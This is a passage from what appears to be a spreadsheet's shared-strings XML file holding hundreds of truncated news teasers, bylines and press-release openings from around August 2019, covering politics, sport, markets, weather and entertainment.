    <t>NEW DELHI (AP) — By appointing Sonia Gandhi interim president, India's oldest political party seems to have sent a message that it can't...</t>
  </si>
  <si>
    <t>Edward Bosworth -</t>
  </si>
  <si>
    <t>Resideo Technologies, Inc. (NYSE: REZI) shares plummeted during Friday’s trading session, losing -$0.63 to see the stock exchange hands at...</t>
  </si>
  <si>
    <t>Coady Fitzgerald</t>
  </si>
  <si>
    <t>For Those Who Adore the Artistry Of Words And The Illumination Of The Mind</t>
  </si>
  <si>
    <t>WENN - World Entertainment News Network                        More from WENN - World Entertainment News Network;Dia Dipasupil</t>
  </si>
  <si>
    <t>Camila Cabello has clapped back at her Internet critics after spotting trolls’ body-shaming comments online. The Senorita star was combing...</t>
  </si>
  <si>
    <t>0 comment Iran appears to be preparing another satellite launch after twice failing this year to put one in orbit, despite US accusations...</t>
  </si>
  <si>
    <t>Ed Komenda</t>
  </si>
  <si>
    <t>LAS VEGAS – Here's an unpalatable dish in the world of Sin City tourism: Resort fees. Along the Strip, nobody likes paying them. But hotel...</t>
  </si>
  <si>
    <t>Investors may be interested in viewing the Gross Margin score on shares of Genco Shipping &amp; Trading Limited (NYSE:GNK). The name currently...</t>
  </si>
  <si>
    <t>The "Integrated Building Management Systems - Global Market Outlook (2017-2026)" report has been added to ResearchAndMarkets.com's...</t>
  </si>
  <si>
    <t>A crew of veteran U.S. astronauts and aviators are training in Houston for a manned mission to the International Space Station aboard...</t>
  </si>
  <si>
    <t>“There are plenty of people coming into the area from other locations. Some are within the metro area or are looking to move up from a...</t>
  </si>
  <si>
    <t>2 comments Malta has said it will allow 356 migrants aboard a humanitarian ship in the central Mediterranean Sea to disembark after six...</t>
  </si>
  <si>
    <t>Alexander Hall</t>
  </si>
  <si>
    <t>Snopes official Twitter tweeted an article titled “Study: Too Many People Think Satirical News Is Real” and wrote that “stories published...</t>
  </si>
  <si>
    <t>Australians have until next month to make a submission to the federal government's inquiry into the feasibility of using nuclear energy as...</t>
  </si>
  <si>
    <t>Concept image showing the proposed design for an HS2 train 0 comment The Government has launched a review into HS2. Here, the PA news...</t>
  </si>
  <si>
    <t>The law firm of Kessler Topaz Meltzer &amp; Check, LLP reminds Acer Therapeutics, Inc. (Nasdaq:ACER) ("Acer") investors that a securities fraud...</t>
  </si>
  <si>
    <t>Hurricane Dorian has gained fearsome new muscle as an "extremely dangerous" Category 4 storm, bearing down on the northwestern Bahamas...</t>
  </si>
  <si>
    <t>EDMONTON, Aug. 8, 2019 /CNW/ - AutoCanada Inc. ("AutoCanada" or the "Company") (TSX: ACQ), a multi-location North American automobile...</t>
  </si>
  <si>
    <t>By Michelle Nichols UNITED NATIONS (Reuters) - Russia and China have asked the United Nations Security Council to meet on Thursday over...</t>
  </si>
  <si>
    <t>Bolton have been told by their administrator that plans to shut down the club have been put on hold, the PA news agency understands....</t>
  </si>
  <si>
    <t>Thuc Nhi Nguyen</t>
  </si>
  <si>
    <t>Linebacker Josh Woods talks about returning to the field after a season-ending knee injury last year, what he learned during the rehab...</t>
  </si>
  <si>
    <t>Ben Schlichter</t>
  </si>
  <si>
    <t>Are you interested to hire someone who is an expert in custom writing? There are numerous online cheap writing services that offer their...</t>
  </si>
  <si>
    <t>Donna Spencer</t>
  </si>
  <si>
    <t>CALGARY — Hockey Canada is beefing up the national women's team's schedule to try to fill a void. Canada will play in the Four Nations Cup...</t>
  </si>
  <si>
    <t>FIRST QUARTER * four.5 40: Senior cornerback Charles Oliver bought in his paintings for the evening after the Aggies stopped the Bobcats...</t>
  </si>
  <si>
    <t>Amerigroup Iowa has announced that seven physician groups specializing in primary care across the state will receive incentive payments for...</t>
  </si>
  <si>
    <t>Global “Natural Gas Pipeline Market” 2019 Industry Research Report is a professional and in-depth study on the current state of the Global...</t>
  </si>
  <si>
    <t>Red Tan – a self-made lounge singer, concert producer and entrepreneur – has launched last July 26th her new single titled Don't You Dare!...</t>
  </si>
  <si>
    <t>Police seized metal poles, bear spray and other weapons Saturday as hundreds of far-right protesters and anti-fascist counter-demonstrators...</t>
  </si>
  <si>
    <t>Aluf Holdings, Inc. Appoints Broadridge Corporate Issuer Solutions, Inc. as Its Transfer Agent and Registrar HOLLYWOOD, FL / ACCESSWIRE /...</t>
  </si>
  <si>
    <t>Joanne Lee-Young                        More from Joanne Lee-Young;Anthony Kwan;TYRONE SIU</t>
  </si>
  <si>
    <t>The arrests on Friday in Hong Kong of several well-known, anti-government activists and a ban on a mass rally planned for Saturday could...</t>
  </si>
  <si>
    <t>Earnings Yield is calculated by taking the operating income or earnings before interest and taxes (EBIT) and dividing it by the Enterprise...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / August 22, 2019 / Levi &amp; Korsinsky, LLP announces that class action lawsuits have commenced on behalf of...</t>
  </si>
  <si>
    <t>Australia's veterans' affairs ministers are meeting in Canberra to discuss how to improve the mental health of former soldiers and help...</t>
  </si>
  <si>
    <t>utep</t>
  </si>
  <si>
    <t>The National Institutes of Health recently awarded a $2.7 million grant to Luis R. Martinez, Ph.D., associate professor of biological...</t>
  </si>
  <si>
    <t>Share VIDEO: Go behind the scenes of the Northern Trust golf club builders News 12 New Jersey News 12’s Robin Deehan goes behind the...</t>
  </si>
  <si>
    <t>PUNE, MAHARASHTRA, INDIA, August 6, 2019 /EINPresswire.com/ -- Dancewear Market 2019 Wiseguyreports.Com adds “Dancewear Market –Market...</t>
  </si>
  <si>
    <t>England were dismissed for a calamitous 67 as their hopes of reclaiming the Ashes were left hanging by a thread on a day that could prove a...</t>
  </si>
  <si>
    <t>Kevin Stevens</t>
  </si>
  <si>
    <t>Round 2 of the 13th Dick's Sporting Goods Open, suspended due to inclement weather Saturday evening, is to resume at 7 a.m. Sunday with 15...</t>
  </si>
  <si>
    <t>Dublin, Aug. 15, 2019 (GLOBE NEWSWIRE) -- The "Top Ten Sensor Companies" report has been added to ResearchAndMarkets.com's...</t>
  </si>
  <si>
    <t>Associated Press BILLINGS (AP) — The Northern Cheyenne Tribe has been awarded $2 million in federal funding to build a solar farm. ...</t>
  </si>
  <si>
    <t>Gazette Staff</t>
  </si>
  <si>
    <t>Checking in on the 50-day moving average vs price signal for Otonomy Inc (OTIC), we have noted that the current reading is Sell. We have...</t>
  </si>
  <si>
    <t>32 mins ago in National, World</t>
  </si>
  <si>
    <t>ASSOCIATED PRESS</t>
  </si>
  <si>
    <t>JERUSALEM (AP) — Israel's interior minister says he has received and granted a request by Democratic Rep. Rashida Tlaib to enter the...</t>
  </si>
  <si>
    <t>New Mexico Educational Retirement Board cut its position in NRG Energy Inc (NYSE:NRG) by 4.6% in the 2nd quarter, according to the company...</t>
  </si>
  <si>
    <t>MELBOURNE, Australia (AP) — The Latest on an appeals court upholding the sex abuse convictions of Cardinal George Pell (all times local):</t>
  </si>
  <si>
    <t>VISALIA, Calif. (KFSN) -- A Visalia man is showing his appreciation for nurses and doctors in quite a colorful way. Eric Anderson was...</t>
  </si>
  <si>
    <t>RYE, N.Y., Aug. 22 /BusinessWire/ -- The Board of Directors of The Gabelli Multimedia Trust Inc. (NYSE:GGT) (the "Fund") reaffirmed its 10%...</t>
  </si>
  <si>
    <t>Level Ex , creator of industry-leading medical video games for physicians, today announced it has received a significant grant from the...</t>
  </si>
  <si>
    <t>NEW YORK, Aug 26 (Reuters) - Venus Williams ended a run of suffering first-round exits at Grand Slam tournaments by walloping China's Zheng...</t>
  </si>
  <si>
    <t>Hayley Warden</t>
  </si>
  <si>
    <t>A never before seen 15-part series revealing stories of Australia's female farmers will soon launch at Western Australia's Dowerin Field...</t>
  </si>
  <si>
    <t>CLOE Bot Helps Policyholders Open a Claim Within Minutes</t>
  </si>
  <si>
    <t>By AAP Newswire</t>
  </si>
  <si>
    <t>Port Adelaide coach Ken Hinkley is demanding a proud performance from his players against Fremantle, regardless of their AFL finals fate....</t>
  </si>
  <si>
    <t>Under the enforcement changes, officials for the first time will be able to publicly attach a cost to saving an animal or plant</t>
  </si>
  <si>
    <t>Cam Bunton</t>
  </si>
  <si>
    <t>Ever since the dawn of free-to-play or "freemium" games - especially those with subscriptions - managing in app purchases has been...</t>
  </si>
  <si>
    <t>Australia are mulling another change to their bowling attack for the third Ashes Test but Pat Cummins is set to back up as he continues to...</t>
  </si>
  <si>
    <t>Democratic presidential candidates say responsibility for inaction on gun violence lies President Donald Trump and the National Rifle...</t>
  </si>
  <si>
    <t>England begin their quest to reclaim the Ashes at their Edgbaston stronghold on Thursday, with captain Joe Root vowing to lead from the...</t>
  </si>
  <si>
    <t>Gregory Katz, Associated Press</t>
  </si>
  <si>
    <t>LONDON (AP) — British Prime Minister Boris Johnson is gambling his future on the audacious proposition that he can blunt an effort to halt...</t>
  </si>
  <si>
    <t>Weatherford International (OTCMKTS:WFTIF) and Oil States International (NYSE:OIS) are both small-cap oils/energy companies, but which is...</t>
  </si>
  <si>
    <t>Brand To Launch New E-Commerce Website</t>
  </si>
  <si>
    <t>By ANGELA CHARLTON and ELAINE GANLEY Associated Press</t>
  </si>
  <si>
    <t>PARIS (AP) — Paris is celebrating the American soldiers, French Resistance fighters and others who liberated the City of Light from Nazi...</t>
  </si>
  <si>
    <t>Bennicas &amp; Associates Inc. cut its holdings in shares of Public Storage (NYSE:PSA) by 1.3% during the second quarter, according to the...</t>
  </si>
  <si>
    <t>NEW YORK, Aug 1 (Reuters) - U.S. Treasury yields fell further on Thursday, with 10-year yields sagging below 2%, in the wake of an industry...</t>
  </si>
  <si>
    <t>Understaffing in some of America’s prisons is causing safety concerns for guards, inmates and even the communities surrounding these...</t>
  </si>
  <si>
    <t>ABC News Radio |</t>
  </si>
  <si>
    <t>(CONVERSE, Texas) — Texas authorities are searching for the gunman responsible for shooting a 15-year-old in the face, killing him. Police...</t>
  </si>
  <si>
    <t>[shortened version by dieselgasoil news]</t>
  </si>
  <si>
    <t>MIAMI, Aug. 27, 2019 /PRNewswire/ -- Cano Health, LLC, which operates medical centers and pharmacies in Florida that specialize in primary...</t>
  </si>
  <si>
    <t>John Bazemore STAFF</t>
  </si>
  <si>
    <t>Atlanta Braves’ Johan Camargo (17) of Panama, takes a photo with a Little League team from Panama before a baseball game against the...</t>
  </si>
  <si>
    <t>Stock-index futures move to the upside, indicating Wall Street could end a volatile month on an up note as worries over the U.S.-China...</t>
  </si>
  <si>
    <t>PARIS (AP) — Paris celebrated the American soldiers, French Resistance fighters and others who liberated the City of Light from Nazi...</t>
  </si>
  <si>
    <t>You don't have to be a political expert to find out if a politician is bought and paid for.</t>
  </si>
  <si>
    <t>The NCFJE assists Jewish participants through meal programs and educational initiatives. New York, NY - August 8, 2019 /MarketersMedia/ —...</t>
  </si>
  <si>
    <t>The Marshall Liberal Government has announced farmers on mainland South Australia will be given the choice to plant Genetically Modified...</t>
  </si>
  <si>
    <t>When was the the last time you boarded flight and discovered you had your whole row to yourself? How about having the whole plane to...</t>
  </si>
  <si>
    <t>By Pierre-Henri Allain and Forrest Crellin RENNES, France, Aug 22 (Reuters) - Some 20 French mayors have banned glyphosate from their...</t>
  </si>
  <si>
    <t>Mother and 2 daughters with serious injuries in stable condition, 2 men with minor injuries</t>
  </si>
  <si>
    <t>Six Washington state troopers have sued Ford, claiming their patrol vehicles made them sick from carbon monoxide poisoning. The officers...</t>
  </si>
  <si>
    <t>Mirador Capital Partners LP bought a new stake in shares of iShares Ultra Short-Term Bond ETF (BATS:ICSH) in the 2nd quarter, according to...</t>
  </si>
  <si>
    <t>The "Influencing, Persuading and Negotiating Skills for International Lawyers" conference has been added to ResearchAndMarkets.com's...</t>
  </si>
  <si>
    <t>SOURCE LUXE Brands NEW YORK, Aug. 14, 2019 /PRNewswire/ -- Grammy winner Ariana Grande, bottles the brilliance of her anthem "thank u...</t>
  </si>
  <si>
    <t>Second report from Mercator Advisory Group’s 2019 Customer Merchant Experience Survey focuses on consumer’s payment preferences and...</t>
  </si>
  <si>
    <t>Bright Horizons Family Solutions Inc (NYSE:BFAM) was the target of a significant drop in short interest in July. As of July 31st, there was...</t>
  </si>
  <si>
    <t>BARRE – Hundreds of Worcester County 4-Hers will head to Felton Field Aug. 24 and 25 for the 70th annual Worcester County 4-H Fair,...</t>
  </si>
  <si>
    <t>WNYT Staff</t>
  </si>
  <si>
    <t>August 05, 2019 04:54 AM The Fulton County Sheriff is asking the public for video of an incident involving a combative man in Mayfield on...</t>
  </si>
  <si>
    <t>Roger Federer made light work of Dan Evans 0 comment Dan Evans was sent spinning out of the US Open on the end of a Roger Federer...</t>
  </si>
  <si>
    <t>Britain is basking in record-breaking temperatures after the Met Office said highs of 28.6C (83.5F) made it the hottest late-August Bank...</t>
  </si>
  <si>
    <t>Cate Cadell</t>
  </si>
  <si>
    <t>BEIJING — Chinese and U.S. trade negotiating teams are maintaining effective communication, China’s Foreign Ministry said on Friday, less...</t>
  </si>
  <si>
    <t>Paul Joseph Watson | Infowars.com A Syrian migrant brutally killed a man with a sword during a broad daylight attack in Stuttgart,...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 19, 2019 /PRNewswire/ -- Trends, opportunities and forecast in utility pole market to 2024 by application type (transmission...</t>
  </si>
  <si>
    <t>Tom Minear and Samantha Landy, Herald Sun</t>
  </si>
  <si>
    <t>Andrew Winter from Love it or List It gives some handy tips for buying at both an auction and private sale</t>
  </si>
  <si>
    <t>Josie Harvey Aug 7th 2019 4:49AM A couple in Victorville, California, were horrified when they got a motion alert from their home...</t>
  </si>
  <si>
    <t>DALLAS (KTVT/CNN) - More than five decades ago, Air Force Col. Roy Knight’s plane went down in Vietnam, and his family never knew exactly...</t>
  </si>
  <si>
    <t>MALIBU, Calif., Aug. 21, 2019 (GLOBE NEWSWIRE) -- via OTC PR WIRE – Green Stream Holdings Inc. (OTC: GSFI), a holding company of Green...</t>
  </si>
  <si>
    <t>Team Obsolete presents Historic trophy for 2019 Classic TT Isle of Man, August 24-25-26-New York’s Team Obsolete has created the “Giacomo...</t>
  </si>
  <si>
    <t>Matthew Perrone, Ap Health Writer</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — U.S. health officials are making a new attempt at adding graphic images to cigarette packets to discourage Americans from...</t>
  </si>
  <si>
    <t>You recognize the announcing if it ain't broke, do not fix it? We'd danger a guess a person over at Netflix has it tattooed on their chest...</t>
  </si>
  <si>
    <t>Omnisport</t>
  </si>
  <si>
    <t>Hakim Ziyech has signed a one-year contract extension at Ajax amid reported interest from Bayern Munich. Bayern were thought to be keen to...</t>
  </si>
  <si>
    <t>by Ray Fister</t>
  </si>
  <si>
    <t>Listen to Kirk Venge of Venge Vineyards in Napa Valley give us his definition of the phrase “Taking a Stab at a Barrel” Podcast: Play in...</t>
  </si>
  <si>
    <t>The "Global Ingestible Sensors Market Analysis &amp; Trends - Industry Forecast to 2027" report has been added to ResearchAndMarkets.com's...</t>
  </si>
  <si>
    <t>Jack Mirkinson</t>
  </si>
  <si>
    <t>The Amazon rainforest fires may be horrifying the world, but that wasn’t enough to get President Trump to attend an urgent meeting on...</t>
  </si>
  <si>
    <t>Australia's financial services sector will be overhauled by the end of next year in the hope of rebuilding consumer confidence in the...</t>
  </si>
  <si>
    <t>Frank Lampard says David Luiz did not go on strike and was not ostracised before his surprise departure to London rivals Arsenal....</t>
  </si>
  <si>
    <t>HOUSTON, TX / ACCESSWIRE / August 14, 2019 / SMG Industries, Inc. (the “Company”) (OTCQB:SMGI), a growth-oriented oilfield services company...</t>
  </si>
  <si>
    <t>* Hong Kong's benchmark stock index shed 2% * Stocks in Europe dropped, led by means of banks and cars * Gold rose 1% at the same time as...</t>
  </si>
  <si>
    <t>DUBLIN (Reuters) - If Britain leaves the European Union without a withdrawal agreement, Ireland could be faced with both security and...</t>
  </si>
  <si>
    <t>Investors are filing lawsuits to recover losses in GPB Capital. Palm Beach, United States - August 15, 2019 /PressCable/ — Haselkorn &amp;...</t>
  </si>
  <si>
    <t>BERLIN (AP) — The Latest on Britain’s plan to leave the European Union (all times local):: 2:40 p.m. German Chancellor Angela Merkel says...</t>
  </si>
  <si>
    <t>BERLIN — A German city that's been the subject of a long-running online light-hearted conspiracy theory claiming it doesn't really exist is...</t>
  </si>
  <si>
    <t>NASHVILLE, Tenn., Aug. 12, 2019 /PRNewswire/ -- The National Association of State Boards of Accountancy (NASBA) is pleased to announce the...</t>
  </si>
  <si>
    <t>Jonathan Liew</t>
  </si>
  <si>
    <t>First they came for Jason Roy. And I did not speak out, because there was a bit of movement, and in any case it’s tough opening the batting...</t>
  </si>
  <si>
    <t>By  Hannah Bargery</t>
  </si>
  <si>
    <t>DO you sleep in the same room as Britain's Biggest Snorer?</t>
  </si>
  <si>
    <t>Zero Hedge</t>
  </si>
  <si>
    <t>It’s hardly a coincidence that Trump – who is determined to blame Powell for the coming crash – is now slamming the Chairman…</t>
  </si>
  <si>
    <t>The dying of cherished reality famous person Beth Chapman maintains to take a toll on her family. Her husband Duane "Dog" Chapman spread...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 06, 2019 (GLOBE NEWSWIRE) -- via NetworkWire – NetworkNewsWire (“NNW”), a multifaceted financial news and publishing...</t>
  </si>
  <si>
    <t>DUBLIN, Aug. 20, 2019 /PRNewswire/ -- The "GxP/GMP Regulation Testing, Services Market in Food, Pharmaceuticals, Medical Devices, and...</t>
  </si>
  <si>
    <t>LOS ANGELES, Aug. 13, 2019 /PRNewswire/ -- Molina &amp; Rangel Public Adjusters announces it has established offices in California. Molina and...</t>
  </si>
  <si>
    <t>LONDON — Princess Charlotte will soon be starting school, and she'll have her older brother to help her get used to a new place. Kensington Palace said Thursday that the 4-year-old princess will attend her first day of school on Sept. 5. Charlotte and 6-year-old Prince George will be students at Thomas's Battersea school in London. The palace says parents Prince William and Catherine, Duchess of Cambridge, will take their two oldest children to school that day.</t>
  </si>
  <si>
    <t>The world famous Louvre museum in Paris on Friday urged visitors to book their visit in advance online after seeing a heavy influx this...</t>
  </si>
  <si>
    <t>Charlotte Bryant</t>
  </si>
  <si>
    <t>Halo Platform (CURRENCY:HALO) traded 23.9% higher against the US dollar during the 24-hour period ending at 13:00 PM E.T. on August 25th....</t>
  </si>
  <si>
    <t>Cyntoia Brown was 16 and living with a man who went by the name Cut Throat who subjected her to beatings and rape.</t>
  </si>
  <si>
    <t>crazycool12 (Posted by)</t>
  </si>
  <si>
    <t>Your browser does not support HTML5 video. Saoirse Roisin Kennedy-Hill has been identified as the young woman who died of a possible drug...</t>
  </si>
  <si>
    <t>By Stephanie Mlot</t>
  </si>
  <si>
    <t>A quarter of a decade after making her screen debut as Marcel on Friends, capuchin monkey Katie may be returning to TV. Eagle-eyed FX CEO...</t>
  </si>
  <si>
    <t>By BERNIE WILSON AP Sports Writer</t>
  </si>
  <si>
    <t>The slow, agonizing demise of the Oakland Raiders will continue for at least one more season</t>
  </si>
  <si>
    <t>Hatton Garden gang ringleader John “Kenny” Collins has been sent back to jail after failing to pay back millions of pounds stolen in the...</t>
  </si>
  <si>
    <t>NEW YORK — Taylor Swift plans to re-record her songs after her catalogue was purchased by popular music manager Scooter Braun. "CBS Sunday...</t>
  </si>
  <si>
    <t>SOUTHAVEN, Miss. (AP) — A northern Mississippi Walmart has reopened to customers after a gunman described as a disgruntled worker shot and...</t>
  </si>
  <si>
    <t>By HOWARD FENDRICH AP Tennis Writer</t>
  </si>
  <si>
    <t>NEW YORK (AP) — Coco Gauff pumping her fists and screaming "Come on!" to celebrate a Grand Slam victory is already becoming a regular...</t>
  </si>
  <si>
    <t>DUBLIN, July 9, 2019 /PRNewswire/ -- The "Global Hydrogen Breath Test Analyzer Market Size, Market Share, Application Analysis, Regional...</t>
  </si>
  <si>
    <t>Lucia Benavides</t>
  </si>
  <si>
    <t>From the moment you step into the restaurant Casa Toribio in Madrid, you will see that it's, well, full of bull. Along with statues...</t>
  </si>
  <si>
    <t>John Waggoner</t>
  </si>
  <si>
    <t>Giving your broker the right order can help you get the best price.</t>
  </si>
  <si>
    <t>By Emily Chow KUALA LUMPUR, Aug 30 (Reuters) - Malaysia'sSime Darby Plantation Bhd said on Friday that it has initiated talks with three...</t>
  </si>
  <si>
    <t>MINNETONKA, MN / ACCESSWIRE / August 14, 2019 / NeuroOne Medical Technologies Corporation (OTCQB:NMTC), a medical device company focused on...</t>
  </si>
  <si>
    <t>Celgene will unload the psoriasis treatment Otezla for $13.4 billion to help make its acquisition by fellow drugmaker Bristol-Myers pass...</t>
  </si>
  <si>
    <t>THE WOODLANDS, Texas, Aug. 8, 2019 /PRNewswire/ -- TETRA Technologies, Inc. ("TETRA") (NYSE:TTI) announced consolidated second quarter net...</t>
  </si>
  <si>
    <t>Disney fans get a sneak peek at new 'Star Wars: Episode IX' footage at fan convention.</t>
  </si>
  <si>
    <t>Chris Cook</t>
  </si>
  <si>
    <t>André Fabre has a live contender for the 2,000 Guineas, following a game success in the Prix Morny by Earthlight. It was a victory to cheer...</t>
  </si>
  <si>
    <t>Kanye West is a born-again Christian. Nicki Minaj has revealed that the 42-year-old rapper - who hosts his own Sunday services which his...</t>
  </si>
  <si>
    <t>Cardiovascular Systems, Inc. (CSI®) (NASDAQ: CSII), a medical device company developing and commercializing innovative interventional...</t>
  </si>
  <si>
    <t>Restoration Hardware (NYSE:RH) had its target price boosted by UBS Group from $126.00 to $138.00 in a research report issued on Tuesday,...</t>
  </si>
  <si>
    <t>CAIRO (AP) — The Latest on the deadly explosion in Cairo (all times local): 4:15 p.m. Egypt's Interior Ministry says the multiple-car...</t>
  </si>
  <si>
    <t>Trump calls for 'intelligent background checks' in response to mass shootings President Trump expressed confidence that Congress would come...</t>
  </si>
  <si>
    <t>AFC Telford boss Gavin Cowan is demanding his players show their ruthless side as they welcome Kidderminster Harriers tonight.</t>
  </si>
  <si>
    <t>/PRNewswire-PRWeb/ -- Vertebrae, a technology innovator in interactive 3D and augmented reality commerce solutions, today announced that it...</t>
  </si>
  <si>
    <t>Shares of Sabra Health Care REIT Inc (NASDAQ:SBRA) have earned an average rating of “Hold” from the ten analysts that are covering the...</t>
  </si>
  <si>
    <t>By BRIAN DULIK</t>
  </si>
  <si>
    <t>CLEVELAND Odell Beckham Jr. and Kareem Hunt made their unofficial FirstEnergy Stadium debuts Saturday as members of the Cleveland Browns....</t>
  </si>
  <si>
    <t>Amazon kicked off its Emmy voting campaign for "The Marvelous Mrs. Maisel" by means of rolling again the clock 60 years in Los Angeles. As...</t>
  </si>
  <si>
    <t>BOULDER, Colo., Aug. 20, 2019 /PRNewswire/ -- PopSockets, maker of expandable phone grips and tech accessories for your digital devices,...</t>
  </si>
  <si>
    <t>Yusuf Variava</t>
  </si>
  <si>
    <t>Da Gama has opened up about the future of the famous trialist looking to impress at the Lions of the North</t>
  </si>
  <si>
    <t>Over a dozen people have been killed and more than a million forced from their homes after Typhoon Lekima hit China. Lekima made landfall...</t>
  </si>
  <si>
    <t>IOWA CITY, Iowa An Iowa agency granted professional licenses to more than 5,800 private security workers without conducting mandatory...</t>
  </si>
  <si>
    <t>Rafael Nadal got a walkover, Alexander Zverev was marathon man again and the women’s fourth seed was sent packing. There was success for...</t>
  </si>
  <si>
    <t>Investigations by the Serious Fraud Investigation Office (SFIO) have revealed that the Securities and Exchange Board of India, and auditor...</t>
  </si>
  <si>
    <t>RICHMOND, Va. (AP) — A lawsuit over a faulty background check that allowed a South Carolina man to buy the gun he used to kill nine people...</t>
  </si>
  <si>
    <t>ATLANTA, August 12, 2019 /PRNewswire-PRWeb/ -- Aloette Cosmetics, North America's premier aloe vera based beauty brand, announces the...</t>
  </si>
  <si>
    <t>As trade war rages, it's suddenly controversial for an international index fund to rebalance</t>
  </si>
  <si>
    <t>"Colin Brinsden" /</t>
  </si>
  <si>
    <t>Prime Minister Scott Morrison has called for calm ahead of what could be another trying week for financial markets and investors. Global...</t>
  </si>
  <si>
    <t>Erin S.</t>
  </si>
  <si>
    <t>This is one curious cat, and it really wants to jump. So, jump it does — and destruction ensues. Good thing this little kitty is pretty...</t>
  </si>
  <si>
    <t>4Front to receive lump-sum settlement with respect to one of its historical revenue-share contracts VANCOUVER, British Columbia and...</t>
  </si>
  <si>
    <t>Daniela Elser</t>
  </si>
  <si>
    <t>She’s a beautiful, talented actress and if things had gone differently, the world would now have a very different Duchess of Sussex.</t>
  </si>
  <si>
    <t>Liverpool defender Virgil van Dijk has identified why his side struggled to contain Chelsea in the first half, and how they were ultimately...</t>
  </si>
  <si>
    <t>Ku Hye Sun and Ahn Jae Hyun shared the sad news that they have been getting divorced. And ahead of their formal split, Ku Hye Sun has...</t>
  </si>
  <si>
    <t>Email parade photos to readerpix@wickedlocal.com</t>
  </si>
  <si>
    <t>By Matt Connolly Clemson has already made history before the 2019 season even starts, but it’s not the kind of history Tigers coach Dabo...</t>
  </si>
  <si>
    <t>The Latest on the European migrant crisis (all times local):</t>
  </si>
  <si>
    <t>by Sean Murphy</t>
  </si>
  <si>
    <t>Famous for being the birthplace of Rabbie Burns, Robert the Bruce and Johnnie Walker Whisky, Ayrshire is now making a name for itself as...</t>
  </si>
  <si>
    <t>At Shelby, N.C., the Idaho Falls Bandits received the American Legion World Series championship on Wednesday morning, defeating Fargo,...</t>
  </si>
  <si>
    <t>Brain injury charity Headway believes cricket may need to look again at its concussion protocols after Steve Smith put himself in an...</t>
  </si>
  <si>
    <t>Melinda Meza</t>
  </si>
  <si>
    <t>From a school janitor to a top-ranking school district superintendent, a Stockton man said his humble beginnings led him to where he is...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 06, 2019 (GLOBE NEWSWIRE) -- Zhang Investor Law announces the filing of a class action lawsuit on behalf of shareholders...</t>
  </si>
  <si>
    <t>Bloomberg</t>
  </si>
  <si>
    <t>“Farmers can potentially perform a service for all of us, that service is to sequest carbon and reverse climate change," said David Perry,...</t>
  </si>
  <si>
    <t>Expect more cases to have new trials ordered or appeals of convictions to become successful once new changes to the way juries are selected...</t>
  </si>
  <si>
    <t>Coal Trading Market 2019: Recent Trends, Size,Growth, Top Manufacturers, Recent Development and Forecast To 2024</t>
  </si>
  <si>
    <t>Bill Chappell</t>
  </si>
  <si>
    <t>Tropical Storm Dorian is forecast to become a hurricane in the eastern Caribbean within the next three days, the National Hurricane Center...</t>
  </si>
  <si>
    <t>PABINEAU FIRST NATION, UNCEDED TRADITIONAL MI'GMAQ TERRITORY, NB, Aug. 29, 2019 /CNW/ - Investing in projects that promote clean energy...</t>
  </si>
  <si>
    <t>The goal of this article is to teach you how to use price to earnings ratios (P/E ratios). To keep it practical, we’ll show how Jagran...</t>
  </si>
  <si>
    <t>With over 50 years of experience, no one is better suited for the finding of commercial real estate in Lacey than Kaufman Construction &amp;...</t>
  </si>
  <si>
    <t>SARANAC, Mich. (AP) - Officials say a 13-year-old western Michigan boy who collapsed during football practice has died at a hospital. The...</t>
  </si>
  <si>
    <t>DEER PARK, Ill., Aug. 01, 2019 (GLOBE NEWSWIRE) -- Eton Pharmaceuticals, Inc (Nasdaq: ETON), a specialty pharmaceutical company focused...</t>
  </si>
  <si>
    <t>Posted By: By Faith Karimi, CNN</t>
  </si>
  <si>
    <t>US prosecutors have charged 80 people -- mostly Nigerians -- in a widespread conspiracy that defrauded at least $6 million from businesses...</t>
  </si>
  <si>
    <t>KEMP, Texas-August 6, 2019- (Newswire.com)- Larson Electronics, a Texas-based company with over 40 years of experience spearheading the...</t>
  </si>
  <si>
    <t>MICHAEL BALSAMO Associated Press</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — Attorney General William Barr staunchly defended the work of law enforcement Monday — promising to push for new...</t>
  </si>
  <si>
    <t>MADISON, Wis. A new report shows the state collected slightly more in taxes during the last fiscal year than the previous year. The...</t>
  </si>
  <si>
    <t>Content created by The Daily Caller News Foundation is available without charge to any eligible news publisher that can provide a large audience. For licensing opportunities of our original content, please contact licensing@dailycallernewsfoundation.org.</t>
  </si>
  <si>
    <t>Shelby Talcott on August 14, 2019 2020 Democratic candidate Cory Booker mixed up his fact checks on taking money from the pharmaceutical...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — President Donald Trump is heading to France for an annual summit of leaders of the world's richest democracies. Trump...</t>
  </si>
  <si>
    <t>By Scottie Andrew, CNN</t>
  </si>
  <si>
    <t>It'll be Skipper and Ping's first chick</t>
  </si>
  <si>
    <t>A 20-year-old rugby league player has been found dead in his hotel room after making his debut in France, his club said. Batley Bulldogs...</t>
  </si>
  <si>
    <t>By Ben Weir</t>
  </si>
  <si>
    <t>Industrial services, media and investment conglomerate Seven Group Holdings has posted a 49 per cent jump in annual profits helped by...</t>
  </si>
  <si>
    <t>Claudine Zap, provided by</t>
  </si>
  <si>
    <t>Just months after securing the largest contract in sports history, Angels superstar Mike Trout has hooked a home in Newport Beach, CA.</t>
  </si>
  <si>
    <t>Share Getty Images The Steelers may want to try to find a way to add Matt Gay to their own kicker competition. The rookie Buccaneers...</t>
  </si>
  <si>
    <t>The 10 drag queens who will compete in the first UK series of RuPaul’s Drag Race include a “tart with a heart”, one who can put out...</t>
  </si>
  <si>
    <t>New York - 08-19-2019 (PRDistribution.com) — Dr. Kelly James, Owner of Dr. Kelly A. James-Foundational Solutions, PLLC, was...</t>
  </si>
  <si>
    <t>Tristan Rich</t>
  </si>
  <si>
    <t>Cisco Systems, Inc. (NASDAQ:CSCO) saw a large increase in short interest during the month of July. As of July 31st, there was short...</t>
  </si>
  <si>
    <t>New England - 26 August, 2019 - New England rapper Ill by Instinct (IBI) is dropping his fourth release, his anticipated new EP entitled...</t>
  </si>
  <si>
    <t>Henry Bruce-Jones</t>
  </si>
  <si>
    <t>Manchester’s Tom Boogizm mixes 105 minutes of material from the mysterious producer.</t>
  </si>
  <si>
    <t>Chris Matthews</t>
  </si>
  <si>
    <t>An export-ban reprieve ends next week</t>
  </si>
  <si>
